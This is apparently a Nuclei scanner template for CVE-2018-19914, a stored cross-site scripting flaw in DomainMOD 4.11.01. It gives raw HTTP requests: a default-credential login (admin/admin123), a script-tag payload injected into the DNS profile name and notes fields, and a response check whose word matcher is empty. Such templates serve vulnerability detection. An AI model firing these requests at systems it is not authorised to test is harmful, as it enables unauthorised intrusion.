id: CVE-2018-19914 info: name: DomainMOD 4.11.01 - 'assets/add/dns.php' Cross-Site Scripting author: arafatansari severity: medium description: | DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/dns.php Profile Name or notes field. reference: - https://www.exploit-db.com/exploits/46375/ - "https://github.com/domainmod/domainmod/issues/87\tExploit Third Party Advisory" - https://github.com/domainmod/domainmod/issues/87 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N cvss-score: 4.8 cve-id: CVE-2018-19914 cwe-id: CWE-79 metadata: verified: "true" tags: wbcecms,xss requests: - raw: - | POST /domain/ HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded new_username=admin&new_password=admin123 - | POST /domain/assets/add/dns.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Origin: https://{{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E - | GET /domain/assets/dns.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded cookie-reuse: true matchers-condition: and redirects: true max-redirects: 3 matchers: - type: word part: body words: - "" - type: word part: header words: - text/html - type: status status: - 200